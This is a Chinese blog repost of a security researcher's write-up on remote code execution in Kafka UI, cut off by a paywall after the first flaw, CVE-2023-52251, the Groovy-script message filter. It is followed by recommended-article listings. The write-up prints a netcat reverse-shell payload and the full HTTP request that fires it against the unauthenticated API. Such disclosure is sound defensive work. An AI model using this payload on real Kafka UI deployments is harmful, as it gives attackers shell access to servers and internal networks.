在 Kafka UI 中获得远程代码执行的 3 种方法

已于 2024-12-24 10:54:18 修改
阅读量776 收藏 25
点赞数 9
CC 4.0 BY-SA版权
文章标签: kafka ui linq
于 2024-12-24 10:53:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/Tananarivel/article/details/144687639

在 Kafka UI 中获得远程代码执行的 3 种方法

在这篇博文中,我们将解释我们如何在 Kafka UI 中发现三个关键漏洞,以及如何利用这些漏洞。

迈克尔·斯捷潘金·@artsploit

7月 22, 2024|更新时间:2024 年 7 月 23 日

|10 分钟

  • 共享:

Kafka UI 是一种流行的开源 Web 应用程序,旨在管理和监控 Apache Kafka 集群。它主要由开发人员和管理员用于提供连接的 Kafka 集群的可视化表示。一些用户可能不知道,在其默认配置中,Kafka UI 不需要身份验证即可读取和写入数据。这会导致许多未受保护的 Kafka UI 实例部署在内部网络中,甚至暴露在 Internet 上。它可能不被视为一个重大的安全问题,因为暴露的数据可能是公开的或根本不敏感,但它可能会打开通往内部网络的大门。

在我的安全研究中,我很好奇,也许我能找到一种方法,不仅可以查看发送到 Kafka 的消息,还可以读取文件、发现凭据,甚至获得远程代码执行 (RCE)。在这篇博文中,我将分享我如何在 Kafka UI 中找到三种不同的 RCE 漏洞的过程。

这些漏洞已在 0.7.2 版本中修复,因此如果您使用 Kafka UI,请务必升级!

CVE-2023-52251:通过 Groovy 脚本执行的 RCE

浏览了 Kafka UI 的 Web 界面后,消息过滤功能引起了我的注意。Kafka UI 允许您提供一个简单的查询来筛选服务器端的消息。当我查看源代码时,我发现 Kafka 内部支持过滤器类型并将其作为 Groovy 脚本进行评估,这使得攻击者有可能执行任意代码。GROOVY_SCRIPT

MessageFilters.java


public static Predicate createMsgFilter(String query, MessageFilterTypeDTO type) {
    switch (type) {
      case STRING_CONTAINS:
        return containsStringFilter(query);
      case GROOVY_SCRIPT:
        return groovyScriptFilter(query);
      default:
        throw new IllegalStateException("Unknown query type: " + type);
    }
  }

要对其进行测试,请通过 UI 导航到其中一个集群,然后选择其中一个主题并单击 “Messages” 选项卡。然后,创建包含以下内容的新筛选条件:

new ProcessBuilder("nc","host.docker.internal","1234","-e","sh").start()

使用反向 shell 生成 ProcessBuilder 的 Filter

这个 Groovy 脚本将生成一个带有反向 shell 的新进程到您的地址。当我们通过 UI 执行此操作时,浏览器会向服务器发送以下请求:

GET /api/clusters/local/topics/topic/messages?q=new%20ProcessBuilder(%22nc%22,%22host.docker.internal%22,%221234%22,%22-e%22,%22sh%22).start()&filterQueryType=GROOVY_SCRIPT HTTP/1.1
Host: 127.0.0.1:8091

您可以在 HTTP 客户端(如 Burp Suite Repeater)中重新发出和试验此请求。

使用反向 shell 触发漏洞利用的 Http 请求

默认的 Kaf

最低0.47元/天 解锁文章

200万优质内容无限畅学
Tananarivel
关注
UI for Apache Kafka
跟着大数据和AI去旅行
11-21 2103
UI for Apache Kafka
使用Kafka UI进行Kafka管理
LmzActionscript的博客
09-20 1386
Kafka UI是一个强大的工具,可以帮助我们更方便地管理和监控Kafka集群。通过Kafka UI,我们可以轻松地创建和管理Topic,查看集群的状态,以及监控生产者和消费者的活动。本文介绍了如何使用Kafka UI进行Kafka集群的管理,并提供了相应的源代码示例。希望这篇文章对你理解和使用Kafka UI有所帮助!
两个远程代码执行漏洞分析
若有战,召必回
12-22 1000
这个版本比起多条利用链的3.2.1版本,添加了一个配置 org.apache.commons.collections.enableUnsafeSerialization,这个配置用来检测反序列化是否安全,不安全的会抛出异常,所以要想办法设置org.apache.commons.collections.enableUnsafeSerialization=true。方法的前面都是,参数的设置,如果为空则修改为默认值,然后将处理好的参数传入this.messagesService.loadMessages。
Apache Kafka 可视化工具调研
hantangduhey的博客
09-05 6412
Apache Kafka 可视化工具调研
【亲测免费】 探索与管理Apache Kafka的利器——UI for Apache Kafka
gitblog_00735的博客
08-08 1855
探索与管理Apache Kafka的利器——UI for Apache Kafka 在大数据和实时流处理的世界里,Apache Kafka无疑是一个强大的工具。然而,管理和监控Kafka集群并不总是那么简单。这就是UI for Apache Kafka闪亮登场的地方,它为你提供了一个直观且功能齐全的Web界面,让Kafka管理变得轻松易行。 项目简介 UI for Apache Kafka是一款专...
史上最轻便好用的kafka ui界面可视化图形界面工具
05-25
史上最轻便好用的kafka ui界面客户端工具,可以在生产消息、消费消息、管理topic、管理group;可以支持管理多个kafka集群;部署简便,可以一键启动,不需要配置数据库、不需要搭建web容器;支持zookeeper ui界面化操作;支持多环境管理;支持redis ui界面化操作;支持多环境管理;支持权限控制,可以自定义不同环境的新增、修改、删除权限;默认分配只读权限,避免用户的误操作
使用Kafka UI管理Kafka
成富的专栏
10-02 1万+
在使用Kafka进行开发时,有个可视化的管理界面有助于提高开发效率。目前已经有很多Kafka的管理界面实现。本文介绍的Kafka UI是一个新的实现。 该界面的GitHub地址是provectus/kafka-ui。GitHub - provectus/kafka-ui: Open-Source Web GUI for Apache Kafka ManagementOpen-Source Web GUI for Apache Kafka Management. Contribute to provectu
KafkaFlink整合原理与代码实例讲解
AI天才研究院
12-03 543
文章标题 《Kafka-Flink整合原理与代码实例讲解》 关键词 Kafka,Flink,整合,原理,代码实例,实时数据处理,流处理,大数据 摘要 本文将深入探讨 Kafka 和 Flink 的整合原理,包括两者的核心概念、架构联系、数
jstorm集成kafka插件demo
04-29
在IT行业中,分布式计算系统和实时数据处理是关键领域,其中JStorm和Kafka都是重要的组件。本示例探讨了如何将JStorm与Kafka进行集成,以实现高效的数据流处理。下面,我们将深入理解这两个工具,以及它们结合使用的...
kafka-ui】支持kafka with kraft的可视化集群管理工具
Aspirin's Nest
01-03 1万+
支持kafka3.3.1的kafka可视化客户端,并且可以连接带认证的kafka集群
Kafka-UI
wsdhla的专栏
09-21 1904
kafka-UI
Kafka ui 搭建以及使用
热门推荐
青冬的博客
12-07 1万+
kafka 本身没有自带相关的 ui 界面,但是很多时候没有页面意味着只有使用命令行进行相关操作如创建 topic、更改 topic 信息、重置 offset 等等。但实际使用中这种效果很差劲,我们一般还是会借助其他软件,实现对 kafka 的页面管控。结合这张图与实际体验,推荐大家使用 ui for apache kafka 进行 kafkaui 界面化管理。其实 kafka-ui 是没有安装过程的,在 github 上已经打包成了 jar 包,当前最新版本为 ,下载地址如下:https://git
【亲测免费】 Kafka-UI安装与配置指南
gitblog_00427的博客
04-01 973
Kafka-UI安装与配置指南 1. 项目基础介绍 Kafka-UI是一个开源的Web界面工具,用于管理和监控Apache Kafka集群。它提供了一个直观的用户界面来查看Kafka集群的详细信息,如代理、主题、分区、生产者和消费者。Kafka-UI支持多集群管理、性能监控、主题配置等功能,并且可以通过自定义身份验证和基于角色的访问控制来保障安全。 主要编程语言:Java、TypeScript 2...
【亲测免费】 Apache Kafka 管理工具:Kafka-UI 使用指南
gitblog_00434的博客
04-01 1200
Apache Kafka 管理工具:Kafka-UI 使用指南 1. 项目介绍 Kafka-UI 是一个开源的、基于 Web 的 Apache Kafka 集群管理工具。它提供了一个直观的用户界面,用于监控和管理 Kafka 集群。Kafka-UI 支持多集群管理、性能监控、查看 Kafka 经纪人、主题、消费者组等功能,并允许用户浏览消息、动态配置主题、自定义身份验证等。 2. 项目快速启动 要...
kafka UI工具部署介绍
qq_23435961的博客
08-02 3131
kafka Map、kafka eagle、Know Streaming、Kafka-UI四款UI工具部署测试
aws-ec2部署UI-for-Apache-Kafka
qq_36227153的博客
07-26 433
###要运行Apache KafkaUI,可以使用预构建的Docker映像或在本地构建它。项目地址:https://github.com/provectus/kafka-ui。访问 Web UI
kafka消息过滤器
justlpf的专栏
06-21 2023
kafka消息过滤器就是消息在到达监听器前被拦截并根据业务设置一种过滤策略,将返回结果为true的消息进行过滤,返回结果为false的消息交由监听器进行业务处理。
Kafka深度解析
fly_air的专栏
12-05 1051
背景介绍 Kafka简介   Kafka是一种分布式的,基于发布/订阅的消息系统。主要设计目标如下: 以时间复杂度为O(1)的方式提供消息持久化能力,即使对TB级以上数据也能保证常数时间的访问性能高吞吐率。即使在非常廉价的商用机器上也能做到单机支持每秒100K条消息的传输支持Kafka Server间的消息分区,及分布式消费,同时保证每个partition内的消息顺序传输同时支持
Kafka 3.9.1的KRaft模式部署
最新发布
Leckun的专栏
07-28 705
(需记录并用于后续格式化)。
掌握Spring Cloud组件:Feign、Kafka、MongoDB、Seata、Swagger、XXL-Job
资源摘要信息: "本文旨在详细介绍feign、kafka、mongdb、Seata、swagger、xxl-job这六大组件的搭建及使用方法。每个组件都是现代IT系统架构中的关键组成部分,它们各自承担着不同的功能和任务。以下将按照组件分别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值